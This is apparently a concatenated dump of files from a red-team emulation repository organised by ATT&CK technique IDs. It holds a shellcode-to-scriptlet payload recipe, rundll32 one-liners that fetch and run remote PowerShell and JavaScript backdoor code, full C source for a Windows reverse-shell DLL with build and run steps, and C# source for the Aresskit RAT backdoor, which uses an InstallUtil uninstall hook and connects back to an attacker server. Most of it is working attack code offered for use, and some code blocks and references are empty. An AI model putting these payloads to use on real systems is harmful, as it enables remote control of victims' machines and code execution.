[`cmd.txt`](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1216/cmd.txt) with the shellcode in base64 format 34 | * Leverage [DotNetToJScript](https://github.com/tyranid/DotNetToJScript) to convert DLL `shellcode.dll` into JS file `payload.js`: 35 | ``` 36 | C:\Users\win7x64\Desktop\release_v1.0.4\DotNetToJScript.exe -c ShellCodeLauncher.Program -v v4 -s C:\Tools\cmd.txt -o c:\Tools\payload.js c:\Tools\shellcode.dll 37 | ``` 38 | * Copy the content of JS file `payload.js` and insert into the code below: 39 | ``` 40 | 41 | 42 | 49 | 50 | 56 | 57 | ``` 58 | * Save the aforementioned code as a file (e.g. `payload.sct`) 59 | 60 | ## hh.exe 61 | ### Execute 62 | Executes `calc.exe` with HTML Help. 63 | ``` 64 | hh.exe c:\windows\system32\calc.exe 65 | ``` 66 | * Usecase: Execute process with `hh.exe` 67 | * Privileges required: User 68 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 69 | 70 | # References 71 | 72 | * 73 | * 74 | * 75 | * 76 | * 77 | * 78 | * 79 | * 80 | -------------------------------------------------------------------------------- /Techniques/T1085/T1085.md: -------------------------------------------------------------------------------- 1 | # Rundll32 2 | 3 | --- 4 | * **ID**: T1085 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Execute 11 | ### AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. 12 | ``` 13 | rundll32.exe AllTheThingsx64,EntryPoint 14 | (e.g. rundll32.exe example.dll,DllMain) 15 | ``` 16 | * Usecase: Execute dll file 17 | * Privileges required: User 18 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 19 | 20 | ### Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. 21 | ``` 22 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" 23 | ``` 24 | * Usecase: Execute code from Internet 25 | * Privileges required: User 26 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 27 | 28 | ### Use Rundll32.exe to execute a JavaScript script that runs calc.exe. 29 | ``` 30 | rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); 31 | ``` 32 | * Usecase: Proxy execution 33 | * Privileges required: User 34 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 35 | 36 | ### Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. 37 | ``` 38 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 39 | ``` 40 | * Usecase: Proxy execution 41 | * Privileges required: User 42 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 43 | 44 | ### Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. 45 | ``` 46 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") 47 | ``` 48 | * Usecase: Execute code from Internet 49 | * Privileges required: User 50 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 51 | 52 | ### Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID. 53 | ``` 54 | rundll32.exe -sta {CLSID} 55 | ``` 56 | * Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. 57 | * Privileges required: User 58 | * OS: Windows 10 (and likely previous versions) 59 | 60 | ## Create a DLL file for Rundll32 61 | * Download and Install `MinGW`: 62 | * Ubuntu: 63 | ``` 64 | apt-get install mingw-w64 65 | ``` 66 | * Windows: 67 | * 68 | * 69 | * Create a .c file with the following codes (simple reverse shell in C): 70 | 71 | ``` 72 | /* Windows Reverse Shell*/ 73 | 74 | #define REVERSEIP "" // change to your listener IP 75 | #define REVERSEPORT // change to your listener Port 76 | 77 | #include 78 | #include 79 | #include 80 | 81 | #pragma comment(lib, "w2_32") 82 | 83 | WSADATA wsaData; 84 | SOCKET Winsock; 85 | SOCKET Sock; 86 | struct sockaddr_in hax; 87 | char aip_addr[16]; 88 | STARTUPINFO ini_processo; 89 | PROCESS_INFORMATION processo_info; 90 | 91 | 92 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 93 | { 94 | WSAStartup(MAKEWORD(2,2), &wsaData); 95 | Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); 96 | 97 | hax.sin_family = AF_INET; 98 | hax.sin_port = htons(REVERSEPORT); 99 | hax.sin_addr.s_addr = inet_addr(REVERSEIP); 100 | 101 | WSAConnect(Winsock,(SOCKADDR*)&hax, sizeof(hax),NULL,NULL,NULL,NULL); 102 | if (WSAGetLastError() == 0) { 103 | 104 | memset(&ini_processo, 0, sizeof(ini_processo)); 105 | 106 | ini_processo.cb=sizeof(ini_processo); 107 | ini_processo.dwFlags=STARTF_USESTDHANDLES; 108 | ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; 109 | 110 | char *myArray[6] = { "cm", "trump", "putin", "d.e", "x", "e" }; 111 | char command[8] = ""; 112 | snprintf( command, sizeof(command), "%s%s%s%s", myArray[0], myArray[3], myArray[4], myArray[5]); 113 | 114 | CreateProcess(NULL, command, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &ini_processo, &processo_info); 115 | exit(0); 116 | } else { 117 | exit(0); 118 | } 119 | } 120 | ``` 121 | 122 | * Compile the .c file to .dll file: 123 | * Ubuntu: 124 | ``` 125 | i686-w64-mingw32-gcc -c shell.c 126 | i686-w64-mingw32-gcc -shared -o shell.dll shell.o -lws2_32 127 | ``` 128 | * Windows: 129 | ``` 130 | gcc -c shell.c 131 | gcc -shared -o shell.dll shell.o -lws2_32 132 | ``` 133 | - Run it through `rundll32.exe`: 134 | ``` 135 | rundll32.exe shell.dll,DllMain 136 | ``` 137 | 138 | # References 139 | 140 | * 141 | * 142 | -------------------------------------------------------------------------------- /Techniques/T1219/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Linq; 3 | using System.Net.Sockets; 4 | using System.Reflection; 5 | 6 | namespace aresskit 7 | { 8 | 9 | [System.ComponentModel.RunInstaller(true)] 10 | public class InstallUtil : System.Configuration.Install.Installer 11 | { 12 | //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. 13 | public override void Install(System.Collections.IDictionary savedState) 14 | { 15 | //Place Something Here... For Confusion/Distraction 16 | } 17 | 18 | //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. 19 | public override void Uninstall(System.Collections.IDictionary savedState) 20 | { 21 | Program.Main(); 22 | } 23 | } 24 | 25 | class Program 26 | { 27 | const string server = ""; // Server Hostname or IP Address to connect back to. 28 | const int port = ; // TCP Port to connect back to. 29 | const bool hideConsole = false; // Show/Hide malicious console on Clients (victims) computer. 30 | const string cmdSplitter = "::"; // Characters to split Class/Method in command input (ex: Administration::IsAdmin or Administration->IsAdmin) 31 | 32 | 33 | private static void sendBackdoor(string server, int port) 34 | { 35 | try 36 | { 37 | TcpClient client = new TcpClient(server, port); 38 | NetworkStream stream = client.GetStream(); 39 | string responseData; 40 | 41 | while (true) 42 | { 43 | byte[] shellcode = Misc.byteCode("aresskit> "); 44 | 45 | stream.Write(shellcode, 0, shellcode.Length); // Send Shellcode 46 | byte[] data = new byte[256]; byte[] output = Misc.byteCode(""); 47 | 48 | // String to store the response ASCII representation. 49 | 50 | int bytes = stream.Read(data, 0, data.Length); 51 | responseData = System.Text.Encoding.ASCII.GetString(data, 0, bytes); 52 | responseData = responseData.Replace("\n", string.Empty); 53 | 54 | if (responseData == "cd") 55 | System.IO.Directory.SetCurrentDirectory(responseData.Split(" ".ToCharArray())[1]); 56 | else if (responseData == "exit") 57 | { // Disconnect the attacker from the C&C backdoor. 58 | 59 | client.Close(); 60 | } 61 | else if (responseData == "kill") 62 | Environment.Exit(0); // Exit cleanly upon command 'kill' 63 | else if (responseData == "help") 64 | { 65 | string helpMenu = "\n"; 66 | var theList = Assembly.GetExecutingAssembly().GetTypes().Where(t => t.Namespace == "aresskit").ToList(); 67 | theList.RemoveAt(theList.IndexOf(typeof(_))); 68 | 69 | foreach (Type x in theList) 70 | { 71 | if (x.Name != "<>c" && x.Name != "LowLevelKeyboardProc") // To rid away unused Classes 72 | helpMenu += Misc.ShowMethods(x) + "\n"; 73 | } 74 | 75 | output = Misc.byteCode(helpMenu); 76 | } 77 | else 78 | { 79 | try 80 | { 81 | if (!responseData.Contains(cmdSplitter)) 82 | { 83 | if (responseData != "") 84 | output = Misc.byteCode("'" + responseData.Replace("\n", "") + "' is not a recognized command.\n"); 85 | } 86 | else 87 | { 88 | responseData = responseData.Trim(); // To eliminate annoying things in the string 89 | 90 | // Will produce: (clas name), (method name), [arg](,)[arg]... 91 | string[] classMethod = responseData.Split(new[] { cmdSplitter }, StringSplitOptions.None); 92 | 93 | 94 | Type methodType = Type.GetType("aresskit." + classMethod[0]); // Get type: aresskit.Class 95 | object classInstance = Activator.CreateInstance(methodType); // Create instance of 'aresskit.Class' 96 | 97 | string[] methodData = classMethod[1].Split(new char[0]); 98 | MethodInfo methodInstance = methodType.GetMethod(methodData[0]); 99 | if (methodInstance == null) 100 | output = Misc.byteCode("No such class/method with the name '" + classMethod[0] + cmdSplitter + classMethod[1] + "'"); 101 | ParameterInfo[] methodParameters = methodInstance.GetParameters(); 102 | 103 | 104 | string parameterString = default(string); 105 | string[] parameterArray = { "" }; 106 | 107 | if (methodInstance != null) 108 | { 109 | if (methodParameters.Length == 0) 110 | { 111 | output = Misc.byteCode(methodInstance.Invoke(classInstance, null) + "\n"); 112 | } 113 | else 114 | { 115 | if (methodParameters[0].ParameterType.ToString() == "System.String") 116 | { 117 | for (int i = 1; i < methodData.Length; i++) 118 | parameterString += methodData[i] + " "; 119 | parameterArray[0] = parameterString; 120 | } 121 | output = Misc.byteCode(methodInstance.Invoke(classInstance, parameterArray).ToString() + "\n"); 122 | } 123 | } 124 | } 125 | } 126 | catch (Exception e) 127 | { output = Misc.byteCode(e.Message + "\n"); } 128 | } 129 | 130 | try 131 | { 132 | stream.Write(output, 0, output.Length); // Send output of command back to attacker. 133 | } 134 | catch (Exception) 135 | { 136 | stream.Close(); 137 | client.Close(); 138 | break; 139 | } 140 | } 141 | 142 | // Close everything. 143 | stream.Close(); 144 | client.Close(); 145 | } 146 | catch (Exception) { while (true) { sendBackdoor(server, port); } } // Pass socket connection silently. 147 | } 148 | 149 | public static void Main() 150 | { 151 | // Hide Window 152 | if (hideConsole) 153 | Toolkit.HideWindow(); 154 | 155 | // Fully featured Remote Administration Tool (RAT) 156 | /* 157 | * Aresskit comes equipped with networking tools and administration tools such as: 158 | * - Built-In Port Scanner 159 | * - Reverse Command Prompt Shell (minimalistic, no auth required) 160 | * - UDP/TCP Port Listener (similar to Netcat) 161 | * - File downloader/uploader 162 | * - Screenshot(s) 163 | * - Real-Time and Log-based Keylogger 164 | * - Self-destruct feature (protect your privacy) 165 | */ 166 | 167 | while (true) 168 | { 169 | if (Network.checkInternetConn("www.bing.com") || server == "") 170 | { 171 | try 172 | { 173 | // Console.WriteLine("Sending RAT terminal to: {0}, port: {1}", server, port); 174 | sendBackdoor(server, port); 175 | } 176 | catch (SocketException) // Attacker Server has most likely forced disconnect 177 | { Console.WriteLine("Attacker has disconnected."); } 178 | catch (Exception e) 179 | { Console.WriteLine(e); } // pass silently 180 | } 181 | System.Threading.Thread.Sleep(5000); // sleep for 5 seconds before retrying 182 | } 183 | } 184 | } 185 | } 186 | --------------------------------------------------------------------------------